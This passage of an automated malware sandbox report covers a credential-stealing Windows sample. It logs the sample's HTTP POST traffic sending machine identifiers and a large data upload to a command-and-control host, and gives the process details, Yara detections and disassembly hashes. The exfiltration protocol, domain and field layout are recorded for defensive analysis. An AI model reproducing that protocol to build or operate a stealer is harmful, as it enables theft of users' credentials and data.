                                                                        2024-10-30 05:16:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:06 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                        2024-10-30 05:16:06 UTC1017INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=khgt1q3a1afqq0ogr2jhma2n23; expires=Sat, 22 Feb 2025 23:02:45 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Pa2YjGAu8daJVU2xpqH3966tesKKCmJniwgXCEkJjbILejPduk5TJ0nBIOteN9h5vWhwzYsrHhPXVEFeNzDBCf22EU4z3nF%2B6LVzvIcR5hSj1o%2FPnUJzHutmD%2Fgu7jMDi5vjnk%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee6aba7b47fd-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21536&delivery_rate=2296590&cwnd=212&unsent_bytes=0&cid=c94231ca1c23dd34&ts=616&x=0"
                                                                        2024-10-30 05:16:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11ok 173.254.250.78
                                                                        2024-10-30 05:16:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549709188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:07 UTC283OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1247
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:07 UTC1247OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:08 UTC1016INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=e783r5pq1tc4u7g5eouvfkacfe; expires=Sat, 22 Feb 2025 23:02:46 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSII47fy1cQAX1q4IYcyy0QssL4%2FSpmZqvbw5P%2F6NypOhAOTjh7wibtTVUwLIXonNmE6kElxluJCRsVqVlIZZGVJKCZUlKAZrffCQeKPvhuiXal2lVmjTP%2BVc280%2B0TWUiN46hI%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee744abc4867-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2166&delivery_rate=2409317&cwnd=242&unsent_bytes=0&cid=273973d82e9f5141&ts=440&x=0"
                                                                        2024-10-30 05:16:08 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11ok 173.254.250.78
                                                                        2024-10-30 05:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549710188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:09 UTC285OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 585622
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 34 b4 a1 d4 16 2e 35 73 ce f4 f3 13 fa ad b3 7e 24 a3 17 b5 47 7c 45 25 92 61 d4 ca fa fb 27 b0 dd 48 59 03 ac 89 e2 f7 a3 59 42 4c 84 bf 75 8b 03 82 7d f9 6a 80 df 58 4a 76 ef ed 90 76 e8 90 2a e9 30 50 1b e6 da fa 3d 92 1c 03 dc ce ca 65 06 34 9b d2 8c 25 80 a4 c7 a1 41 aa 0f 43 5f 02 96 a7 10 d8 81 db f0 91 41 cf 42 8c d6 fd 20 d9 9a 17 50 bc 2a fa 97 c2 e0 ea cc 7e 7b 85 25 e1 0b c1 47 e0 57 d4 26 3e 0b 56 73 4f de c1 7b 45 22 d7 4e 52 02 dd 20 c6 93 57 a0 0d ae 06 5b 86 d7 d6 ed 8b d1 a0 ce af e3 ef 4a cd 55 69 2c 9c 11 8c a3 1d 42 74 05 ea 46 25 42 86 af 83 24 30 26 bc 22 bd 3b 3a 10 43 47 92 47 22 53 75 6d 36 43 07 33 4d 99 9e 0f fb 1b 79 d5 30 2e 83 b6 f2 8d 69 1b 0d a0 3d cb 34 e1 93 a1 26 4b cd d4 0a 30 69 10 e6 e9 6a 5e 2c 94 fd 4b 75 8c df ed
                                                                        Data Ascii: 4.5s~$G|E%a'HYYBLu}jXJvv*0P=e4%AC_AB P*~{%GW&>VsO{E"NR W[JUi,BtF%B$0&";:CGG"Sum6C3My0.i=4&K0ij^,Ku
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: cb 77 7e 77 37 2f a8 0f 06 d4 72 54 c7 1e a9 98 8d 49 39 6a f9 66 11 26 82 63 85 12 41 c3 6b 6e d4 50 7a 32 de 0a 84 29 4c 14 cc 77 95 03 4d 94 db a3 56 82 58 5a 57 33 82 af 01 fb 50 42 0b fa 9e 78 28 d5 87 fd 7d a8 51 4a cd 89 64 4f 9f e4 ee d3 46 69 24 35 be 17 52 99 d9 ed bd 70 f5 09 9e ad 89 82 93 e5 af cc 45 b6 ce 53 85 e0 78 84 b2 2e 83 2d c0 f5 3c b9 6a d2 98 aa 8b f6 8a 6f 8b 7f 57 35 09 8a 04 6a 94 21 45 c0 3f 35 cc fd 39 2c f8 f7 34 7d 3b 4b 90 a5 3e 28 95 16 a3 b3 ee 36 da 55 6b 80 bd db a9 7e c5 05 67 73 88 f4 8b ee 7c 54 e1 de e2 81 bd 48 29 0d 12 1a 3c 77 7e ef 7f 89 a1 17 d3 72 dd 1a 1c ad 31 56 f2 21 20 80 5e b5 39 2c d3 ae 71 94 14 11 75 4f 52 14 37 c9 4f b5 65 a5 53 13 40 8b d6 e2 64 e5 01 02 c1 34 93 ed fe c5 84 5f a6 d7 f8 be d5 09 6d
                                                                        Data Ascii: w~w7/rTI9jf&cAknPz2)LwMVXZW3PBx(}QJdOFi$5RpESx.-<joW5j!E?59,4};K>(6Uk~gs|TH)<w~r1V! ^9,quOR7OeS@d4_m
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 37 26 a8 da 08 34 e7 fd 8f 5f a4 7d 1c c5 73 d2 83 97 ba 84 6b cb ff 8e 12 41 aa 73 65 47 d5 a7 85 36 6e 4c 18 96 22 06 72 dd fe 39 f6 4e 38 61 40 30 02 58 6e c2 48 6a 3b 82 92 e9 87 34 c6 40 bb c6 f6 3d 03 94 97 ec 6b 1a ff 9e 47 90 bd b7 a8 7f 97 77 76 ce a1 55 cd ff 80 92 20 c0 89 06 6b e2 20 e9 a5 bd 28 e8 e2 4c 55 0d 57 78 e9 cc 0e c9 42 8a 3d fd 72 07 c2 06 81 b7 d8 35 26 83 8a 98 20 68 da 3c 4f 6b 22 64 6b 60 ee 48 46 13 e0 a0 f2 1c 76 4d 57 e7 df 66 d4 86 a3 07 4c 98 c1 3b db c4 2b 58 e0 7f c4 83 7f 06 c0 c0 cc 93 13 7d 63 1f 45 7a ed 14 02 48 b0 e7 cb 46 08 ce cf 6a 4d 2c 2a 1d e5 f0 70 5a 19 a2 5b ad f2 9c a2 06 b2 ae 9a 0a 8d c9 ce c7 23 c8 98 c8 a8 db a7 a5 b7 2f 18 d6 df 6b 98 fd 58 88 55 38 90 2a 62 83 a3 40 91 bb 0b ec cc 61 40 20 e6 c3 fd
                                                                        Data Ascii: 7&4_}skAseG6nL"r9N8a@0XnHj;4@=kGwvU k (LUWxB=r5& h<Ok"dk`HFvMWfL;+X}cEzHFjM,*pZ[#/kXU8*b@a@
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: ec 14 53 ad 1b da 57 48 8e 3a ca b0 f7 ca 2f 16 ef 38 fe 49 59 95 6e b4 e1 5d 70 6d fb 9f f7 cd 64 05 99 95 81 43 6a 95 ed e1 d6 94 4c d0 52 ef ed 13 8e 7f 4e 7f 02 b5 98 67 89 d4 06 6b 55 97 d9 45 53 8b 79 a1 93 46 85 c7 ce c7 2f 4e 08 93 6a 48 0a d3 5b 75 2f 84 e8 ee ff 44 5c f1 7e 39 07 97 10 01 a0 b1 f8 49 ea ca 04 8a f1 67 20 ef 14 d4 b9 c3 e6 c2 41 9b 74 47 8b 9a ae f0 64 05 fc bf 13 04 77 44 6a cf 6e 79 f1 a3 e6 88 1e 72 f4 d5 d6 cd 7e c7 9f ae b8 f5 20 b3 67 c8 fe d8 19 1d 90 2f cc 9a 9e 85 01 17 54 f8 ee dc 0e bc dc ff 81 b0 1f a6 b8 7f e7 c0 f7 02 58 99 74 27 5f 53 e6 c0 84 ac 1f 90 fb 2d fb 07 03 07 f5 8e e6 ec e1 05 08 82 e7 df 0c 13 d6 65 f3 03 f9 69 f4 78 f6 13 04 a3 86 2b fd ea 47 95 26 aa fa f1 56 e2 69 5f fc 71 69 c5 b3 32 aa 2e a1 51 90
                                                                        Data Ascii: SWH:/8IYn]pmdCjLRNgkUESyF/NjH[u/D\~9Ig AtGdwDjnyr~ g/TXt'_S-eix+G&Vi_qi2.Q
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 24 50 bd 7b 2d 7b 19 c8 7d 51 8c a4 3d bb 44 a5 c7 e4 45 87 1c 61 b5 55 be 09 8f df 79 31 08 47 74 61 20 32 58 45 c9 8f a8 71 e9 4a ab cd 5a cd 2e 82 27 b8 b8 df dc d9 29 39 2c 92 86 81 41 58 7f a6 38 fe d1 33 f3 bc fa b0 4b 5c 44 84 0a 82 0e 89 c6 79 56 6d 7c fb ac d9 27 45 28 a9 56 af 69 cb 9a 91 49 88 5b 46 ab 71 ac bb d2 ca 78 c6 9e b5 6b 0f 8b f1 9a 7f 0b 65 2a bd 64 24 42 6e 0a f4 d0 8b e6 93 03 61 62 b8 37 21 f1 cb 3c ce 43 f2 b3 d6 4c 5f 1e 7e 61 72 53 85 81 5e 88 f0 fb 51 b6 35 c9 2c c0 ee 0e d6 44 cd 56 95 11 8a 16 22 ce 51 f0 cb 3c ab b5 74 0d 0d 1b e2 55 24 57 f0 f7 35 7a 7b 5f a4 80 99 b7 0f 2c d7 8d 2d f4 8b f9 0f 46 8e 56 18 4a ad 6e 2d a8 3f bf ce fd 60 87 39 4c e6 08 61 61 d6 1b 04 48 09 3c 79 30 59 20 79 df cd 27 e6 85 26 eb 1e 5b 7f 65
                                                                        Data Ascii: $P{-{}Q=DEaUy1Gta 2XEqJZ.')9,AX83K\DyVm|'E(ViI[Fqxke*d$Bnab7!<CL_~arS^Q5,DV"Q<tU$W5z{_,-FVJn-?`9LaaH<y0Y y'&[e
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 65 5c 9a 8f 72 45 0d 2e 3d 6d c3 03 49 93 ff 1b 81 19 20 22 f0 bf 31 1e df 92 e1 ca 47 20 0e 30 c7 a0 ed 63 a5 b8 19 01 a6 53 16 e6 d5 00 3e 3f 17 a7 ec 0c 01 4c bb 89 90 9d 72 1a 16 3e 21 9b 13 92 7e 09 3e f5 5a 29 1d ef ad b7 a0 ae ae fa f0 12 cd 0f 6d 8c 09 9f 9b 78 d1 e8 b5 5f 4c 5e 15 6a 65 e5 f9 f3 0e e8 0b e9 6c 0f a2 e0 f3 e8 0b fb bd d9 66 9e af 8b 09 b6 70 4e 1f 08 5c c6 5c 1b 4c 6d 5a 73 39 96 78 c4 09 09 ee 58 08 f0 6f e1 41 69 f4 41 64 15 f6 34 e8 c0 b2 1b 17 58 13 35 94 a9 af 2a 39 05 4d 86 86 9a 92 39 47 28 b1 a8 e8 34 4a a3 81 9b 4b dd fe 2d ca a8 3a 94 56 c6 b3 c2 bf 7c 4d 94 04 62 63 ce 73 4e 83 42 64 41 8c e7 a2 d9 e0 19 c6 3d 71 d6 8d c5 68 5d 8e 7d 0f 2e d7 1b 2b 86 12 90 2f fc a5 2c 8c 57 5c b3 7a f3 df f6 78 53 12 6e 15 b3 f4 f6 20
                                                                        Data Ascii: e\rE.=mI "1G 0cS>?Lr>!~>Z)mx_L^jelfpN\\LmZs9xXoAiAd4X5*9M9G(4JK-:V|MbcsNBdA=qh]}.+/,W\zxSn
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 46 91 92 6b 5c 1f 90 db ff cb 7c ad 28 ab 30 87 01 fc 7d 1e d6 ea 74 f9 09 b6 68 a7 f3 0e 61 92 2e 34 ab d9 f9 3b e1 4e 75 14 55 77 9f 95 2b bf f0 1f fc 31 f5 b0 35 b0 72 c5 f7 5e 15 2d 43 c9 d5 5c 68 3c ce f6 b8 29 ac dc 1c 9c 87 05 16 59 68 82 cf c0 3f b7 fe b3 35 08 f3 34 14 4c db fd e2 17 31 8a 2d 38 e7 a8 27 49 bc d5 7c 55 71 60 87 54 59 75 28 ef bf 47 51 2f ee d2 fe 58 a3 c9 08 af 1b 4e f8 9d 89 91 19 e9 f1 ce 63 7d fb c4 3e cd 71 ec 2a 0b 39 b5 bb 04 fc a9 7c 9e ed d4 ef d4 df 5c a6 e9 b4 ba 9e 10 a7 a3 aa 3f 0c 08 69 9f e9 a5 c6 0d 52 e0 66 61 1f fb 02 ef 46 d4 1d 58 58 4b 5e 09 0c a6 cc ad 2f 8d 19 af 97 e7 f1 c1 05 0b 46 de 2a d7 50 6e d0 1e 6e 01 5b a7 aa a2 04 50 df 3d da 43 1c c5 c0 7a 77 9b 57 de b1 b6 0a 23 7c 06 fa 3f cd 37 cc f3 d3 a8 fa
                                                                        Data Ascii: Fk\|(0}tha.4;NuUw+15r^-C\h<)Yh?54L1-8'I|Uq`TYu(GQ/XNc}>q*9|\?iRfaFXXK^/F*Pnn[P=CzwW#|?7
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 44 bd 3a 2a 5f 25 3f 38 bf 7c 0d 3f ee 06 50 03 cb 19 55 0f d3 ff b5 49 d0 b0 89 62 db 88 29 cb e8 4e bc bd cc e9 4c 45 83 4f ab 11 5a c0 52 43 e3 f3 2a ea cf c7 6e db b0 f4 66 56 81 f7 e6 b4 dc 15 bc f0 10 91 8d 65 36 ca 50 16 b5 36 89 db 0f 6a 81 33 18 58 1a 3a 5b 9f 5e 17 e6 75 68 ea e6 75 ae 60 f5 72 ab 66 82 d8 8d ca 17 4b 68 4a a2 4d a2 16 b8 b1 d5 39 52 e7 0c ea 24 f9 4f d8 2e 0d 99 10 dd 73 98 97 05 9b c8 b7 e9 da ee 45 26 ff a1 eb e3 6c 86 2b 31 51 76 bf 57 9c ef 32 08 bf dc b1 61 91 70 c7 5a f4 70 c3 10 61 2d b3 8e 26 2c f8 06 0f 41 7c da 93 96 b6 e9 a8 aa e9 7b fe eb 77 a8 74 e3 cf 28 57 d9 b1 c8 b0 81 0f 12 19 e9 cd 6b c3 d2 7f ca 7c 36 2f 39 fb d0 f2 06 d9 6a b4 04 6f 74 bb 98 c5 6a 74 08 86 a6 82 56 00 87 84 2d 0a 6d 87 c6 7f 8f ab 0f 0d 36
                                                                        Data Ascii: D:*_%?8|?PUIb)NLEOZRC*nfVe6P6j3X:[^uhu`rfKhJM9R$O.sE&l+1QvW2apZpa-&,A|{wt(Wk|6/9jotjtV-m6
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: ca 10 e8 6e a8 20 dc 16 9c 5b 84 71 41 7c 00 5a 5e 35 4c b0 53 e2 0c eb e7 2a 54 97 55 01 b4 42 39 0f b1 cd db 69 1b b8 76 ac b3 79 b3 e0 38 dd 67 dd ab bc cb 99 a2 17 ae 6f 4a b9 d2 65 d2 2c 0a 30 4d 4a b5 35 fa 0a 8a 73 db 66 bb d9 1c 19 3e 77 4c 08 1c 28 8e b9 50 5e b8 28 2b 8c 3a 59 e4 91 db 2f ec da e0 23 bd 57 b4 cd 77 76 58 a0 e6 02 cf 8b 88 80 d9 31 38 f8 6d 0c da 03 0e bb 4e ba ac f4 f1 a0 a8 ab 51 b5 69 dc 1a 4f 76 7d 80 46 46 ba 93 d9 6d eb 21 e7 a3 2a 92 f3 f5 c4 89 d7 3e a1 d4 bd bb 8e bd 7d d8 fa bd b2 f1 33 f7 d7 72 bd af fd fa 8b d7 8a 9e 12 56 e7 31 ab 79 b9 95 3b c9 23 73 5c 3f 87 16 b5 52 f6 b4 21 6d 34 6f 91 c3 da 54 6d b1 35 20 ae 2e b8 f1 8d b3 a4 87 06 dd f8 dd 48 32 e1 ea c1 fb c9 43 1d 53 85 17 c0 aa 12 2b 95 db 1c f6 23 7d 64 4a
                                                                        Data Ascii: n [qA|Z^5LS*TUB9ivy8goJe,0MJ5sf>wL(P^(+:Y/#WwvX18mNQiOv}FFm!*>}3rV1y;#s\?R!m4oTm5 .H2CS+#}dJ
                                                                        2024-10-30 05:16:10 UTC1025INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=spllms35hk6ui49rq4md005tn4; expires=Sat, 22 Feb 2025 23:02:49 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOAfp%2Bs%2BfO45TlOXFnfK8kPLaBspbM5pBTOaT8GbdWS2nWmv4vNYqC%2BA6pFWYhoRbtlTlKizS7k5y%2FP3LXvr1y4AFrEmlf6rBiY1oiX4%2FHvpwDGv5k1wuDoFPlSbWHsiTZxUyMM%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee7dbb36839f-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1518&sent=228&recv=634&lost=0&retrans=0&sent_bytes=2846&recv_bytes=588215&delivery_rate=1844585&cwnd=252&unsent_bytes=0&cid=6f1c0e80be58632f&ts=1804&x=0"


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:01:15:57
                                                                        Start date:30/10/2024
                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                        Imagebase:0x20000
                                                                        File size:2'975'744 bytes
                                                                        MD5 hash:263307CBC603BEF82F9365CC2FD70B46
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089349102.0000000001646000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089206820.0000000001642000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Non-executed Functions

                                                                          Function 016373C7 Relevance: .2, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp, Offset: 01632000, based on PE: false
                                                                          • Associated: 00000000.00000003.2129107930.0000000001632000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_1637000_file.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0697271c4fc967d44b80bb5d26a1ee6942c5b900e3997719122403d77bdf4052
                                                                          • Instruction ID: d446bc3913869c22f495beeb6e1e4eabdde1d42464f3d7fb896bd547a4962f90
                                                                          • Opcode Fuzzy Hash: 0697271c4fc967d44b80bb5d26a1ee6942c5b900e3997719122403d77bdf4052
                                                                          • Instruction Fuzzy Hash: 6B81307600A7C19FC717CF38DDA6586BFB4BE53220B1C46CAD8814F1A3D361A61AC796
                                                                          Function 0163742A Relevance: .2, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp, Offset: 01632000, based on PE: false
                                                                          • Associated: 00000000.00000003.2129107930.0000000001632000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_1637000_file.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e1bbbe37d016a95bdcf4c3a594b3bdc41721cf6e6a8eeef9e400af77c5c6e964
                                                                          • Instruction ID: c2204e451d54bd2e6429f9aa0ff1dec8fee72674650611dcc974ea3e454d7c9d
                                                                          • Opcode Fuzzy Hash: e1bbbe37d016a95bdcf4c3a594b3bdc41721cf6e6a8eeef9e400af77c5c6e964
                                                                          • Instruction Fuzzy Hash: 6151313600A3C49BCB17CF34D9955CABFA4BE57320B2849DAD4810F123D661A659C796